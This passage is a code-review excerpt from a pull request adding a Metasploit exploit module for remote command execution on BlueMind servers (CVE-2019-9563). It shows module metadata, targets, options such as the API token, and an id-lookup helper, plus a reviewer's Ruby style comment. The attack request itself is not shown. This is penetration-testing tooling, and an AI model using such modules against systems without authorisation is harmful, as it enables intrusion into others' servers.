modules/exploits/multi/http/bluemind_api_submit_command.rb

```diff
@@ -0,0 +1,155 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'json'
+require 'securerandom'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "BlueMind submit_command API Command Execution",
+      'Description'    => %q{
+        Command Execution on BlueMind through the submit_command API.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+        'Damien Picard <damien.picard[at]synacktiv.com>',
+        'Julien Szlamowicz <julien.szlamowicz[at]synacktiv.com>'
+      ],
+      'References' =>
+      [
+        ['CVE' , '2019-9563']
+      ],
+      'Targets' => [
+        [
+          'Unix CMD', {
+            'Platform' => %w{ unix },
+            'Arch' => [ ARCH_CMD ]
+          }
+        ],
+        [
+          'Linux x86', {
+            'Platform' => %w{ linux },
+            'Arch' => [ ARCH_X86 ]
+          }
+        ],
+        [
+          'Linux x64', {
+            'Platform' => %w{ linux },
+            'Arch' => [ ARCH_X64 ]
+          }
+        ],
+      ],
+      'DisclosureDate' => 'Mar 4 2019'
+      ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base BlueMind URI', '/']),
+        OptString.new('APIKEY', [true, 'The BlueMind core api token']),
+        OptString.new('INSTALLATION_ID', [false, 'The BlueMind installation id on which to run command']),
+        OptString.new('SERVER_ID', [false, 'The BlueMind server id on which to run command'])
+      ])
+  end
+
+  def get_installation_id
+    if datastore['INSTALLATION_ID'].nil?
+      installation_id = uniq_and_notify(list_installations(), "server")
+    else
+      installation_id = datastore['INSTALLATION_ID']
+    end
+    return installation_id
```

Comment:
`return` is not required if the returned object is the last line of the method.

```suggestion
    installation_id
```